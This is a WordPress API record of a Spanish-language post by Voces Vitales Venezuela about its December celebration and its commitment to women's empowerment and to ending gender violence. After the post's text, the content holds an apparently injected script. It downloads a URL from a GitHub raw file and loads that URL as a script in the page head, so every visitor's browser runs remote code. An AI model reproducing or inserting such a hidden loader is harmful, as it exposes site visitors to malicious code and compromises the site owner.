{"id":3827,"date":"2023-12-11T17:52:58","date_gmt":"2023-12-11T22:22:58","guid":{"rendered":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3827"},"modified":"2024-07-25T05:14:39","modified_gmt":"2024-07-25T09:44:39","slug":"vvv-celebro-su-fiesta-decembrina-en-compania-de-amigas-os-y-aliados","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3827","title":{"rendered":"VVV celebr\u00f3 su fiesta decembrina en compa\u00f1\u00eda de amigas\/os y aliados"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Imagen-de-WhatsApp-2023-12-09-a-las-18.25.04_8bc830fe.jpg\"><img loading=\"lazy\" class=\"size-medium wp-image-3828 alignleft\" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Imagen-de-WhatsApp-2023-12-09-a-las-18.25.04_8bc830fe-300x267.jpg\" alt=\"\" width=\"300\" height=\"267\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Imagen-de-WhatsApp-2023-12-09-a-las-18.25.04_8bc830fe-300x267.jpg 300w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Imagen-de-WhatsApp-2023-12-09-a-las-18.25.04_8bc830fe-768x683.jpg 768w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/01\/Imagen-de-WhatsApp-2023-12-09-a-las-18.25.04_8bc830fe.jpg 1021w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><strong>Voces Vitales Venezuela<\/strong> celebr\u00f3 la fiesta decembrina en compa\u00f1\u00eda de nuestras amigas\/os y aliados, compartiendo momentos de alegr\u00eda. Sin embargo, somos conscientes que todav\u00eda queda mucho por hacer en nuestro pa\u00eds.<\/p>\n<p style=\"text-align: justify;\">Por ello, seguiremos trabajando incansablemente para promover el <strong>liderazgo<\/strong> y <strong>empoderamiento de las mujeres venezolanas<\/strong>, luchando por su reconocimiento y participaci\u00f3n activa en todos los \u00e1mbitos de la sociedad. Adem\u00e1s, nos enfocaremos en erradicar la <strong>violencia de g\u00e9nero<\/strong>, un flagelo que afecta a muchas mujeres en el mundo.<\/p>\n<p style=\"text-align: justify;\">Queremos expresar nuestro agradecimiento sincero a todos aquellos que nos han apoyado y acompa\u00f1ado a lo largo de este a\u00f1o. Sin su respaldo, ser\u00eda imposible llevar a cabo nuestra importante labor. Esperamos poder seguir contando con su apoyo en el futuro, ya que sabemos que juntos podemos lograr un cambio real y duradero en la vida de las mujeres venezolanas.<\/p>\n<p style=\"text-align: justify;\">La fiesta decembrina fue un momento para celebrar, pero tambi\u00e9n para reflexionar sobre la importancia de seguir trabajando arduamente por los <strong>derechos<\/strong> y el <strong>bienestar<\/strong> de todas las mujeres en nuestro pa\u00eds. Sigamos unidas en esta lucha para construir un futuro m\u00e1s justo e igualitario para todas.<\/p>\n<p><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Voces Vitales Venezuela celebr\u00f3 la fiesta decembrina en compa\u00f1\u00eda de nuestras amigas\/os y aliados, compartiendo momentos de alegr\u00eda. Sin embargo, somos conscientes que todav\u00eda queda mucho por hacer en nuestro pa\u00eds. Por ello, seguiremos trabajando incansablemente para promover el liderazgo&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3827\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3828,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[542,1,16],"tags":[],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3827"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3827"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3827\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3828"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3827"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3827"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3827"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}